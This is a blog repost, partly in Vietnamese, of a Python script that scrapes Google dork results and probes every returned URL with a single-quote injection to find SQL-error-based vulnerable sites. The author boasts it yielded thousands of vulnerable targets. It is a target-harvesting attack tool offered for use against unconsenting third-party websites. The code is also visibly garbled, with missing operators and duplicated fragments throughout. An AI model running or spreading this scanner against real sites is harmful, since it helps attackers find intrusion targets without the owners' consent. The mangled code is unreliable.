16 thg 8, 2013

SQL Injection Scanner

I coded this long time ago, was the first tool I coded in python just to learn the language, it's not very complex but does a pretty good job anyway. 
Here's the code:

#!/usr/bin/python #    Copyright (C) 2010 <xrrrx@ymail.com> #    This program is free software: you can redistribute it and/or modify #    it under the terms of the GNU General Public License as published by #    the Free Software Foundation, either version 3 of the License, or #    at your option) any later version. #     #    This program is distributed in the hope that it will be useful, #    but WITHOUT ANY WARRANTY; without even the implied warranty of #    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the #    GNU General Public License for more details. #     #    You should have received a copy of the GNU General Public License #    along with this program.  If not, see <http://www.gnu.org/licenses/>. 
from multiprocessing import Process from xgoogle.search import GoogleSearchSearchError
from itertools import count
import urllib2
from itertools import count import urllib2sysargparse

global strSQLi

strSQLi 

strSQLi = ["error in your SQL syntax"# GENERIC
           
           "Syntax error at"# GENERIC
           
           "You have an error in your SQL"# MYSQL
           
           "Division by zero in"# MYSQL
           
           "not a valid MySQL result"# MYSQL
           
           "Call to a member function"# MYSQL
           
           "Microsoft JET Database"# MSACCESS
           
           "ODBC Microsoft Access Driver" # MSACCESS
           
           "Microsoft OLE DB Provider for SQL Server"# MSSQL
           
           "Unclosed quotation mark"# MSSQL
           
           "Microsoft OLE DB Provider for Oracle"# ORACLE
           
           "Macromedia][SQLServer JDBC Driver]"# COLDFUSION

def split(alistwanted_parts=1):
    
    length len(alist)
    return [ 
    return [ alist[i*length // wanted_parts: (i+1)*length // wanted_parts]
             
             for i in range(wanted_parts) ]

def checkSQLi(resultsi):
    
    # test single quote
    
    for result in results[i]:
        try:
            if(
        try:             if(args.verbose>='2'):
                print 
                print "[INFO] Testing URL: %s" result.url
            
            if not "=" in result.url:
                if(
                if(args.verbose>='2'):
                    print 
                    print "[INFO] No params available for injection for: %s" result.url
                
                continue
            
            response urllib2.urlopen(result.url.replace("=""='"))
            
            html response.read()
        
        except Exceptione:
            if(
            if(args.verbose>='1'):
                print 
                print "[ERROR] %s" e
            
            continue
        
        except KeyboardInterrupt:
            return 
            return False
        
        else:
            if(
            if(checkSQLiStr(html)):
                    print 
                    print "[INFO] URL: %s" result.url
                    
                    print "       Possible vulnerable!"
            
            else:
                if(
                if(args.verbose>='1'):
                    print 
                    print "[INFO] URL: %s" result.url
                    
                    print "       Not vulnerable."
    
    return False

def checkSQLiStr

def checkSQLiStr(html):
    return 
    return any(checkStr in html for checkStr in strSQLi)

def main():
    
    tries 0
    
    while True:
        try:
            if(
        try:             if(args.verbose>='1' and tries 0):
                print 
                print "[WARNING] (%d) Retrying google search query" tries
            
            if(tries>=args.retry):
                if(
                if(args.verbose>='1'):
                    print 
                    print "[ERROR] Maximum retries reached..."
                
                sys.exit()
            else:
                
            else:                 tries tries 1
            googleSearch 
            googleSearch GoogleSearch(args.keyword)
            
            googleSearch.page args.page
            googleSearch
            googleSearch.results_per_page 100
            
            print args.keyword
            
            for i in count():
                
                allResults googleSearch.get_results()
                if 
                if not allResults# no more results (pages) were found
                    
                    break
                
                splitResults split(allResultsargs.threads)
                
                processes = [Process(target=checkSQLiargs=(splitResults,i)) for i in range(args.threads)]
                if(
                if(args.verbose>='1'):
                    print 
                    print "[INFO] Starting %d threads..." args.threads
                
                for p in processes:
                    
                    p.start()
                for 
                for p in processes:
                    
                    p.join()
                
                tries 0
            
            print "Finished..."
            
            sys.exit()
            
            # finished
        
        except SearchErrore:
            if(
            if(args.verbose>='2'):
                print 
                print "[ERROR] Search failed: %s" e
            
            continue
        
        except KeyboardInterrupt:
            print 
            print "Suspended by user..."
            
            sys.exit()

if 

if __name__ == '__main__':
    
    parser argparse.ArgumentParser()
    
    parser.add_argument('-v'dest='verbose', default='0'help='Verbosity level'choices='012')
    
    parser.add_argument('-p'dest='page'type=int, default='0'help='Start google search from page')
    
    parser.add_argument('-s'dest='stop'type=int, default='5'help='Stop at -s page')
    
    parser.add_argument('-r'dest='retry'type=int, default='4'help='Amount of times to retry after google search timeout')
    
    parser.add_argument('-t'dest='threads'type=int, default='2'help='Threads for checking SQLi in query results')
    
    group parser.add_argument_group('required arguments')
    
    group.add_argument('-k'dest='keyword'help='Keywords to use on google query'required=True)
    
    args parser.parse_args()
    print 
    print "Starting..."
    
    main()
    
    sys.exit()  

Required libraries:

http://argparse.googlecode.com/svn/trunk/argparse.py https://github.com/pkrumins/xgoogle (this one needs fixes,you can fix it yourself or download this one http://www.mediafire.com/?7a175lzzipm3x3s) 

Usage:

usagescanner.py [-h] [-{0,1,2}] [-p PAGE] [-s STOP] [-r RETRY]
[-
[-t THREADS] -k KEYWORD

optional arguments

optional arguments:
-
-h, --help show this help message and exit
-
-{0,1,2Verbosity level -p PAGE Start google search from page -s STOP Stop at -s page -r RETRY Amount of times to retry after google search timeout -t THREADS Threads for checking SQLi in query results

Example

Example./scanner.py -'somekeyword inurl:"php?id="' -t 5 -v 1   


xargs can be used to feed google dorks from a file.

It basically scrape results from google with the keyword you input and try test for sql injection. It only checks for error based injections with single quote triggers, the idea was to add more injection methods, more search engines and other features, but I never continued the development, it still gave me thousands of vulnerable targets.

So if someone would like to improve it or add some feature please share it.

+ Lưu File Đó dưới dạng đuôi python ( *.py ).Phải cài Python trước để sử dụng..
+ Có Readme Kèm Theo + Example
+ Site Lỗi Sẽ Được Lưu Dưới Dạng Txt nằm cùng thư mục python bạn chạy

Nguồn: VNCno1

Không có nhận xét nào:

Đăng nhận xét